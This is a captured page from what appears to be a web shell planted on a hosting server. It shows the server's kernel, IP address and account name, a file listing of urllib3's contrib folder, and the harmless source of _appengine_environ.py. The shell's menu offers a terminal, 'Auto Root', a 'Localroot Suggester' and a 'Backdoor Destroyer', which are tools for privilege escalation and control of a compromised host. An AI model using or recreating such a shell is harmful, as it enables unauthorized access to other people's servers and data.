Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.9 /
site-packages /
urllib3 /
contrib /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2025-08-15 18:37
_securetransport
[ DIR ]
drwxr-xr-x
2025-08-15 18:37
__init__.py
0
B
-rw-r--r--
2021-05-26 16:59
_appengine_environ.py
957
B
-rw-r--r--
2021-05-26 16:59
appengine.py
10.75
KB
-rw-r--r--
2021-05-26 16:59
ntlmpool.py
4.06
KB
-rw-r--r--
2021-05-26 16:59
pyopenssl.py
16.48
KB
-rw-r--r--
2021-05-26 16:59
securetransport.py
33.61
KB
-rw-r--r--
2021-05-26 16:59
socks.py
6.93
KB
-rw-r--r--
2021-05-26 16:59
Save
Rename
""" This module provides means to detect the App Engine environment. """ import os def is_appengine(): return is_local_appengine() or is_prod_appengine() def is_appengine_sandbox(): """Reports if the app is running in the first generation sandbox. The second generation runtimes are technically still in a sandbox, but it is much less restrictive, so generally you shouldn't need to check for it. see https://cloud.google.com/appengine/docs/standard/runtimes """ return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27" def is_local_appengine(): return "APPENGINE_RUNTIME" in os.environ and os.environ.get( "SERVER_SOFTWARE", "" ).startswith("Development/") def is_prod_appengine(): return "APPENGINE_RUNTIME" in os.environ and os.environ.get( "SERVER_SOFTWARE", "" ).startswith("Google App Engine/") def is_prod_appengine_mvms(): """Deprecated.""" return False